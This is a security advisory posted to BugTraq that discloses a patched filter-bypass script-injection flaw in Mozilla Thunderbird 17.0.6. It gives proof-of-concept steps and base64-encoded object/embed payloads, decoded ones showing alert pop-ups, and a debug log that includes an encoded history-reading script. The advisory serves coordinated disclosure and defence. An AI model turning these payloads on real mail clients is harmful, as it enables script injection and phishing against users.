BugTraq
Mozilla Bug Bounty #5 - WireTap Remote Web Vulnerability Jan 27 2014 02:51PM
Vulnerability Lab (research vulnerability-lab com)
Document Title:
===============
Mozilla Bug Bounty #5 - WireTap Remote Web Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=953

Mozilla Bug Tracking ID: 875818

Video: http://www.vulnerability-lab.com/get_content.php?id=1182

Partner News (Softpedia): http://news.softpedia.com/news/Critical-Validation-and-Filter-Bypass-Vul
nerability-Fixed-in-Thunderbird-420962.shtml

Release Date:
=============
2014-01-27

Vulnerability Laboratory ID (VL-ID):
====================================
953

Common Vulnerability Scoring System:
====================================
7.3

Product & Service Introduction:
===============================
Thunderbird is a free, open-source, cross-platform application for managing email and news feeds. It is a
local (rather than a web-based) email application that is powerful yet easy-to-use. Thunderbird has lots of cool features.
Thunderbird gives you control and ownership over your email. There are lots of add-ons available for Thunderbird that
enable you to extend and customize your email experience. Thunderbird is part of the Mozilla Manifesto, a pledge that
describes Mozilla`s commitment to an open, accessible, egalitarian Internet.

( Copy of the Vendor Homepage: http://www.mozilla.org )
( Copy of the Product Homepage: http://www.mozilla.org/en-US/thunderbird/ )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a critical validation and filter bypass vulnerability in the official Mozilla Thunderbird 17.0.6 email software.

Vulnerability Disclosure Timeline:
==================================
2013-05-10: Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2013-05-11: Vendor Notification (Mozilla Security Incident Team)
2013-05-21: Vendor Response/Feedback (Mozilla Security Incident Team)
2014-01-18: Vendor Fix/Patch (Mozilla Developer Team - Reward 1.500$ SWB)
2014-01-27: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Mozilla
Product: Thunderbird - EMail Application 17.0.6

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
It has been discovered that the security controls / filters currently being used in Mozilla Thunderbird application can be easily
evaded if an attacker decides to encrypt the payloads with base64 encryption and combine it with the <object> tag. During the testing,
it was initially noticed that malicious javascript tags were being filtered / blocked in the Thunderbird application however, Attaching
a debugger with the Thunderbird .exe file revealed some very interesting information and gave much better insight behind the actual
working of the application. Most of the information revealed is Javascript errors which gave the researcher much hope in believing that
the application might actually be vulnerable.

By default, HTML tags like <script> and <iframe> are blocked in Thunderbird and get filtered immediately upon insertion however,
While drafting a new email message, attackers can easily bypass the current input filters by encoding their payloads
with base64 encryption and using the <object> tag and insert malicious scripts / code eg. (script / frame) within the emails
and send it to the victims. The exploit gets triggered once the victim decides to reply back and clicks on the `Reply` or `Forward` Buttons.

After successfully bypassing the input filters, an attacker can inject persistent script code while writing a new email and send it to victims.
Interestingly the payload gets filtered during the initial viewing mode however if the victim clicks on Reply or Forward, the exploit gets executed
successfully. For a POC i will be including multiple examples in this advisory for your review. I was able to run multiple scripts generating strange
behaviour on the application which can be seen in the debugging errors which I have attached along with this report.

These sort of vulnerabilities can result in multiple attack vectors on the client end which may eventually result in complete
compromise of the end user system. The persistent code injection vulnerability is located within the main application.

Exploitation of this persistent application vulnerability requires a low or medium user interaction. Successful exploitation of
the vulnerability may result in malicious script code being executed in the victims browser resulting in script code injection,
persistent phishing, Client side redirects and similar client side attacks.

Vulnerable Service(s):
[+] Mozilla Thunderbird 17.0.6 - Latest Release

Vulnerable Section(s):
[+] Write (Create a new message)
[+] Email Signature (Account Settings)
[+] Attach File with Signature as HTML (Account Settings)

Proof of Concept (PoC):
=======================
The filter bypass & persistent script code inject web vulnerabilities can be exploited by remote attackers without privileged user account
or direct user interaction. For security demonstration or to reproduce the vulnerability follow the provided steps and information below.

Proof of Concept #1

a) Create a new email message
b) In the body text, insert new HTML tag with the POC "Payload"
c) Send the email to the victim
d) Open the new email in the victim browser and click Reply
e) You should now see a Javascript Application popup window proving the existence of this vulnerability.

Proof of Concept #2

a) Goto Tools and then Account Settings
b) Under the Signature Text, insert the Payload and enable 'Use HTML'
c) Close the menu and Click on "Write" to create a new email
d) You should get a popup the moment new Email editor window opens up proving the existence of this vulnerability.

Proof of Concept #3

a) Create a new text file on your desktop (local computer) and insert the POC payload in it and save it as test.html (HTML)
b) Goto Tools and then Account Settings
c) Below the Signature Text box, enable 'Attach the signature from a file instead'
d) Click Choose and select the 'test.html' file which you created in step a.
e) Click on Write and you should be able to see the Javascript popup proving the existence of this vulnerability.

Payload #1

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmly
ZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24t
UE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=
"></object>

Payload #2

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub
3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov
L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8x
OTk5
L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0i
MjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIk1vemls
bGEt
VGh1bmRlcmJpcmQtU2NyaXB0LUNvZGUtSW5qZWN0aW9uLVBPQy1BdGVlcS1LaGFuIik7PC9z
Y3Jp
cHQ+PC9zdmc+" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

1.3

POC Technical Description:

Here, we used the data URI payload as a value assigned to the â??dataâ?? attribute of the â??objectâ?? tag. The <object> tag is used to include objects
such as images, audio, videos, Java applets, ActiveX, PDF, and Flash. The â??dataâ?? attribute of the object tag defines a URL that refers to the
objectâ??s data. Data in the "data:" URI is encoded as a base64 string:

Base64-encoded payload: PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rp
b24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=

Base64-decoded payload: <script>alert("Mozilla-Thunderbird-Script-Code-Injection-POC-Ateeq-Khan"
);</script>

When the browser loads the object tag, it loads an object (in our case, itâ??s a javascript) assigned to its data attribute. This causes execution
of our javascript. We were able to bypass the application blacklist filter because of the base64-encoded payload.

1.4

Email Header showing the hidden malicious payload

Message-ID: <5195AABB.9000409 (at) ccure (dot) it [email concealed]>
Date: Fri, 17 May 2013 08:57:47 +0500
From: Ateeq Khan <ateeq (at) ccure (dot) it [email concealed]>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20130509 Thunderbird/17.0.6
MIME-Version: 1.0
To: ateeq <ateeq (at) ccure (dot) it [email concealed]>
Subject: Test
X-Enigmail-Version: 1.5.1
Content-Type: multipart/alternative;
boundary="------------070707070308040102070208"
X-Provags-ID: V02:K0:x1sxyB72JjArK0t7OpMGlUdnbY0vjneQvJdkX/twIfw
QgzRaY5JN/SeFJ/fl2yULg+LJCKojYYGFR/8wrcS9hv6B6WWrN
mur6d1IsxEn2D2kZt5fQ3tk8Z1qDiEpN5C7vrtOyEFAMJR3NHg
jsL6elL9oxDkDRj1rYWvipndH1vonoPT3kjbcmuPsEZwYZ0JkL
BjvA5CQE3qDMPgd5nzdT8SqKBRrj9u7m/irxCWHeJcnAG0XBnK
txadh05EhpYjzrsz2kd+EyQe8ABh9F+yHQs6PBgIJeMDhm3EmY
KPDb5TDHAsnDSD7e3jSaj1t/jhHWc4OA+Okkw+PsyBasdNvzw=
=
X-UI-Junk: AutoNotJunk -999 (UWL);
V01:9SSPrMSv:3OJduITnBKJW2sO9FDRIJW8REKQH86F2DhxLUWcUUFzS1g0JhJ7
GgRkniiwfqYstxpjhSj957gz/8tEx07A4XeXZriK0TD0WhS1DXezTz/TtZsDYDEh
hoWYOFl3bb5yC2QDLQsFZpUW8W11Q1ueL83Jxhvv1UmeH1zGnYFLHhAFOpzxH4jN
652vXWc8dXjmX/WjTrvcI6NDjWdTTTfnDoO2PVFxLR+Tspu5HEv+SDuyrKv18Pei
ogK+aeYsHnGw+Sv4tyfEE3I/nLbDefudGihBnld6s0loLxOOAGeIYxOeZ4Je+v0h
MH9Y6ICIP7qvG/CkWt1PYQDzeNRPMANzlOgD/c//0kMjpKd6GwFWZIgfLyEFGGGA
5ghpw5skyHXrAcf+FBq4ayJpL2UIfGeghWw==
X-Nemesis-Spam: whitelist
Envelope-To: ateeq (at) ccure (dot) it [email concealed]

This is a multi-part message in MIME format.
--------------070707070308040102070208
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

--

--------------070707070308040102070208
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

<html>
<head>

<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
</head>
<body text="#000000" bgcolor="#FFFFFF">
<object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmly
ZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=
"></object>
<div class="moz-signature">-- <br>
<script>alert(1)</script></div>
</body>
</html>

--------------070707070308040102070208--

1.5

Interesting Raw Application Logs captured during the entire process of testing:

(4fbc.3828): Break instruction exception - code 80000003 (first chance)
eax=fff82000 ebx=00000000 ecx=00000000 edx=7792f85a esi=00000000 edi=00000000
eip=778a000c esp=0ffffd94 ebp=0ffffdc0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!DbgBreakPoint:
778a000c cc int 3
0:040> g

[JavaScript Error: "Search service falling back to synchronous initialization at SRCH_SVC__ensureInitialized@resource:///components/nsSearchService.js:24
98
@resource:///components/nsSearchService.js:3476
_adjustAcItem@chrome://messenger/content/webSearch.xml:42
@chrome://messenger/content/webSearch.xml:22
" {file: "resource:///components/nsSearchService.js" line: 2499}]
[JavaScript Error: "2013-05-18 06:02:42 gloda.datastore ERROR Async queryFromQuery error: 1: malformed MATCH expression:
["<EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMu
b3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA
wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"]
" {file: "resource:///modules/gloda/log4moz.js" line: 687}]
2013-05-18 06:02:42 gloda.datastore ERROR Async queryFromQuery error: 1: malformed MATCH expression:
["<EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMu
b3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA
wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"]

[JavaScript Error: "2013-05-18 06:02:42 gloda.datastore ERROR Async queryFromQuery error: 1: malformed MATCH expression:
["<EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMu
b3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA
wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"]
" {file: "resource:///modules/gloda/log4moz.js" line: 687}]
2013-05-18 06:02:42 gloda.datastore ERROR Async queryFromQuery error: 1: malformed MATCH expression:
["<EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMu
b3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA
wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"]

[JavaScript Error: "An error occurred executing the cmd_insertHTMLWithDialog command: [Exception...
"Could not convert Native argument arg 3 [nsIDOMJSWindow.openDialog]" nsresult: "0x8057000a (NS_ERROR_XPC_BAD_CONVERT_NATIVE)"
location: "JS frame :: chrome://editor/content/ComposerCommands.js :: <TOP_LEVEL> :: line 2790" data: no]"
{file: "chrome://global/content/globalOverlay.js" line: 95}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml"
line: 1736}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml"
line: 1736}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/folderDisplay.js" line: 2342}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/folderDisplay.js" line: 2342}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it."
{file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY
3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml"
line: 1736}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml"
line: 1736}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it."
{file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY
3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messenger.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messenger.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/folderDisplay.js" line: 1621}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it."
{file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY
3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://global/content/bindings/toolbar.xml" line: 276}]
"chrome://global/content/bindings/general.xml" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
No chrome package registered for chrome://navigator/content/navigator.xul
[JavaScript Error: "NS_ERROR_FAILURE: Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIDOMJSWindow.open]" {file: "data:text/html;base64,
PFNDUklQVD4KdmFyIHdpbiA9IHdpbmRvdy5vcGVuKCk7Cm5ldHNjYXBlLnNlY3VyaXR5LlBy
aXZpbGVnZU1hbmFnZXIuZW5hYmxlUHJpdmlsZWdlKAogIlVuaXZlcnNhbEJyb3dzZXJBY2Nl
c3MiKTsKZm9
yICh2YXIgaT0wOyBpIDwgaGlzdG9yeS5sZW5ndGg7IGkrKykgewogd2luLmRvY3VtZW50Lnd
yaXRlbG4oaGlzdG9yeVtpXSArICI8QlI+Iik7Cn0KbmV0c2NhcGUuc2VjdXJpdHkuUHJpdml
sZWdlTWFuYW
dlci5yZXZlcnRQcml2aWxlZ2UoCiAiVW5pdmVyc2FsQnJvd3NlckFjY2VzcyIpOwp3aW4uY2
xvc2UoKTsKPC9TQ1JJUFQ+" line: 2}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
No chrome package registered for chrome://navigator/content/navigator.xul
[JavaScript Error: "NS_ERROR_FAILURE: Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIDOMJSWindow.open]" {file: "data:text/html;base64,
PFNDUklQVD4KdmFyIHdpbiA9IHdpbmRvdy5vcGVuKCk7Cm5ldHNjYXBlLnNlY3VyaXR5LlBy
aXZpbGVnZU1hbmFnZXIuZW5hYmxlUHJpdmlsZWdlKAogIlVuaXZlcnNhbEJyb3dzZXJBY2Nl
c3MiKTsKZm9y
ICh2YXIgaT0wOyBpIDwgaGlzdG9yeS5sZW5ndGg7IGkrKykgewogd2luLmRvY3VtZW50Lndy
aXRlbG4oaGlzdG9yeVtpXSArICI8QlI+Iik7Cn0KbmV0c2NhcGUuc2VjdXJpdHkuUHJpdmls
ZWdlTWFuYWdl
ci5yZXZlcnRQcml2aWxlZ2UoCiAiVW5pdmVyc2FsQnJvd3NlckFjY2VzcyIpOwp3aW4uY2xv
c2UoKTsKPC9TQ1JJUFQ+" line: 2}]

[JavaScript Error: "An error occurred executing the cmd_insertHTMLWithDialog command: [Exception... "Could not convert Native argument arg 3
[nsIDOMJSWindow.openDialog]" nsresult: "0x8057000a (NS_ERROR_XPC_BAD_CONVERT_NATIVE)" location: "JS frame :: chrome://editor/content/ComposerCommands.js
:: <TOP_LEVEL> :: line 2790" data: no]" {file: "chrome://global/content/globalOverlay.js" line: 95}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
Security Error: Content at moz-nullprincipal:{37db781d-d6d3-44bb-ade4-a79dcc63c0dd} may not load or link to about:blank.
Security Error: Content at moz-nullprincipal:{44bab10a-4bd8-4cfb-a519-eb2535344039} may not load or link to about:blank

[JavaScript Error: "[Exception... "'DB failed getting form autocomplete values' when calling method: [nsIFormAutoComplete::autoCompleteSearch]"
nsresult: "0x8057001e (NS_ERROR_XPC_JS_THREW_STRING)" location: "<unknown>" data: no]"]
[JavaScript Error: "aSubject.popup is undefined" {file: "resource:///modules/glodaWebSearch.js" line: 68}]

[JavaScript Warning: "The stylesheet data:,*%7bx:<script>alert(1)</script>askjn</h1>expression(write(2))%7D was loaded as CSS even though its MIME type,
"text/plain", is not "text/css"." {file: "about:blank" line: 0}]
[JavaScript Warning: "Unknown property 'x'. Declaration dropped." {file: "data:,*%7bx:<script>alert(1)</script>askjn</h1>expression(write(2))%7D"
line: 1]

[JavaScript Error: "GenericSendMessage FAILED: [Exception... "Component returned failure code: 0x8055311a [nsIMsgCompose.SendMsg]"
nsresult: "0x8055311a (<unknown>)" location: "JS frame :: chrome://messenger/content/messengercompose/MsgComposeCommands.js :: GenericSendMessage ::
line 2814" data: no]" {file: "chrome://messenger/content/messengercompose/MsgComposeCommands.js" line: 2817}]
"chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "Use of attributes' nodeValue attribute is deprecated. Use value instead."
{file: "chrome://messenger/content/messengercompose/MsgComposeCommands.js" line: 3996}]
Security Error: Content at moz-nullprincipal:{549c3f5a-560d-4469-9b0f-09f598998b0b} may not load or link to about:blank.
Security Error: Content at moz-nullprincipal:{63e416e7-9cc4-458f-b93d-882bb2ad9121} may not load or link to about:blank.
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://global/content/bindings/general.xml" line: 0}]
[JavaScript Error: "Search service falling back to synchronous initialization at SRCH_SVC__ensureInitialized@resource:///components/nsSearchService.js:24
98
@resource:///components/nsSearchService.js:3476
_adjustAcItem@chrome://messenger/content/webSearch.xml:42
@chrome://messenger/content/webSearch.xml:22

[JavaScript Warning: "The stylesheet data:,*%7bx:<script>alert(1)</script>askjn</h1>expression(write(2))%7D
was loaded as CSS even though its MIME type, "text/plain", is not "text/css"." {file: "about:blank" line: 0}]
stylesheet was loaded successfully as text/plain even though it should have been.

Solution - Fix & Patch:
=======================
2014-01-18: Vendor Fix/Patch (Mozilla Developer Team - Reward 1.500$ SWB)

Security Risk:
==============
The security risk of the persistent input validation vulnerabilities and filter bypass is estimated as high(+).

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan (ateeq (at) evolution-sec (dot) com [email concealed]) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.

Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus